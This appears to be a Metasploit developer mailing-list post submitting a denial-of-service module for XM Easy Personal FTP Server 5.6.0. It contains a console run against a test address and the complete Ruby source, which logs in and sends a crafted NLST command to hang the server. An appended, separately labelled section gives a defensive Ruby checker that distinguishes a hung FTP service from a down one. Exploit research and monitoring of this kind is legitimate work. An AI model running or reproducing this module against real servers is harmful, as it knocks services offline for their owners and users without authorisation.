Hey guys,

I've attached a new DoS auxiliary module for the XM Easy Personal FTP Server 5.6.0. In testing I've noticed that the server still technically listens for connections, but it doesn't do any good.

    msf > use dos/windows/ftp/xmeasy560_nlst
    msf auxiliary(xmeasy560_nlst) > set RHOST 192.168.10.2
    RHOST => 192.168.10.2
    msf auxiliary(xmeasy560_nlst) > set FTPUSER anonymous
    FTPUSER => anonymous
    msf auxiliary(xmeasy560_nlst) > set FTPPASS anonymous
    FTPPASS => anonymous
    msf auxiliary(xmeasy560_nlst) > run
    [*] Connecting to FTP server 192.168.10.2:21...
    [*] Connected to target FTP server.
    [*] Authenticating as anonymous with password anonymous...
    [*] Sending password...
    [*] OK, server may still be technically listening, but it won't respond
    [*] Auxiliary module execution completed
    msf auxiliary(xmeasy560_nlst) > info

           Name: XM Easy Personal FTP Server 5.6.0 NLST DoS
        Version: 1

    Provided by:
      Kris Katterjohn <[EMAIL PROTECTED]>

    Basic options:
      Name     Current Setting  Required  Description
      ----     ---------------  --------  -----------
      FTPPASS  anonymous        yes       Valid FTP password for username
      FTPUSER  anonymous        yes       Valid FTP username
      RHOST    192.168.10.2     yes       The target address
      RPORT    21               yes       The target port

    Description:
      This module is a port of shinnai's script. You need a valid login,
      but even anonymous can do it as long as it has permission to call
      NLST.

Thanks,
Kris Katterjohn
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'XM Easy Personal FTP Server 5.6.0 NLST DoS',
      'Description'    => %q{
        This module is a port of shinnai's script. You need
        a valid login, but even anonymous can do it as long as it
        has permission to call NLST.
      },
      'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
      'License'        => MSF_LICENSE,
      'Version'        => '1',
      'References'     => [ [ 'URL', 'http://milw0rm.com/exploits/6741'] ],
      'DisclosureDate' => 'Oct 13 2008'))

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
    ])
  end

  def run
    connect_login
    raw_send("NLST -1\r\n")
    disconnect
    print_status("OK, server may still be technically listening, but it won't respond")
  end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
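
Added example, not part of the original post or the submitted module: the post notes that the server keeps accepting connections after the DoS but no longer responds, so a plain port check would still report it as up. The sketch below contrasts a TCP-only check with one that waits for the FTP "220" greeting; the names tcp_open?, ftp_liveness and fake_ftp are hypothetical, and the two local listeners are constructed stand-ins, not the real product.

```ruby
require 'socket'

# Plain reachability check: succeeds as soon as the TCP handshake completes,
# which the kernel does even if the application never services the socket.
def tcp_open?(host, port, timeout: 3)
  Socket.tcp(host, port, connect_timeout: timeout).close
  true
rescue SystemCallError, SocketError
  false
end

# Protocol-level check: a healthy FTP server greets with a "220" reply.
#   :ok   greeting received
#   :hung port accepts connections but sends no valid greeting in time
#   :down connection could not be established
def ftp_liveness(host, port, timeout: 3)
  sock = Socket.tcp(host, port, connect_timeout: timeout)
  begin
    return :hung unless IO.select([sock], nil, nil, timeout)
    sock.readpartial(512).start_with?('220') ? :ok : :hung
  rescue EOFError, Errno::ECONNRESET
    :hung
  ensure
    sock.close
  end
rescue SystemCallError, SocketError
  :down
end

# Constructed test listener on loopback. With greet: false nothing ever
# calls accept, imitating a service that listens but does not respond.
def fake_ftp(greet:)
  server = TCPServer.new('127.0.0.1', 0)
  return server unless greet
  Thread.new do
    loop do
      begin
        server.accept.write("220 constructed banner\r\n")
      rescue SystemCallError
        next # client disconnected before the greeting was written
      end
    end
  end
  server
end
```

A monitor that only runs the first check would miss the condition described in the post; alerting on :hung as well as :down catches it.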